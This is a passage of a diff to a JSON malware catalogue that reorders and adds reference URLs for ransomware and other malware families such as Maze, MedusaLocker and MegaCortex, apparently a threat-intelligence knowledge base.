"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-187a-north-korean%20state-sponsored-cyber-actors-use-maui-ransomware-to-target-the-hph-sector.pdf",
- "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf"
+ "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/"
],
"synonyms": [],
"type": []
@@ -31187,115 +32895,117 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maze",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://www.secureworks.com/research/threat-profiles/gold-village",
- "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
- "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
- "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
- "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
- "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://adversary.crowdstrike.com/adversary/twisted-spider/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
"https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
- "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://twitter.com/certbund/status/1192756294307995655",
- "https://oag.ca.gov/system/files/Letter%204.pdf",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "http://www.secureworks.com/research/threat-profiles/gold-village",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.docdroid.net/dUpPY5s/maze.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://securelist.com/maze-ransomware/99137/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
- "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
- "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
"https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/",
+ "https://twitter.com/certbund/status/1192756294307995655",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://adversary.crowdstrike.com/adversary/twisted-spider/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
+ "https://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/",
+ "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
+ "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "http://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.docdroid.net/dUpPY5s/maze.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
+ "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
"https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/",
- "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
- "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/",
- "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
- "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
"https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
- "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
- "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/"
+ "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
+ "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://oag.ca.gov/system/files/Letter%204.pdf"
],
"synonyms": [
"ChaCha"
@@ -31310,9 +33020,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock",
- "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d",
"https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/",
+ "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100"
],
"synonyms": [
@@ -31341,10 +33051,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi",
- "https://www.symantec.com/connect/blogs/bios-threat-showing-again",
"https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/",
"http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/",
- "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html"
+ "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html",
+ "https://www.symantec.com/connect/blogs/bios-threat-showing-again"
],
"synonyms": [
"MyBios"
@@ -31359,6 +33069,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
],
@@ -31388,8 +33099,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa",
- "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/",
"https://news.drweb.com/show/?i=10302&lng=en"
],
@@ -31404,30 +33115,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.cybereason.com/blog/medusalocker-ransomware",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
"https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/",
"https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html",
- "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf",
- "https://blog.talosintelligence.com/2020/04/medusalocker.html",
- "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html",
- "https://twitter.com/siri_urz/status/1215194488714346496?s=20",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
+ "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html",
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/",
+ "https://asec.ahnlab.com/en/48940/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://blog.talosintelligence.com/2020/04/medusalocker.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.cybereason.com/blog/medusalocker-ransomware",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/"
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/",
+ "https://twitter.com/siri_urz/status/1215194488714346496?s=20"
],
"synonyms": [
"AKO Doxware",
@@ -31444,26 +33159,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex",
- "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/",
- "https://blog.malwarebytes.com/detections/ransom-megacortex/",
- "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
"https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/",
+ "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/",
+ "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/",
"https://threatpost.com/megacortex-ransomware-mass-distribution/146933/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
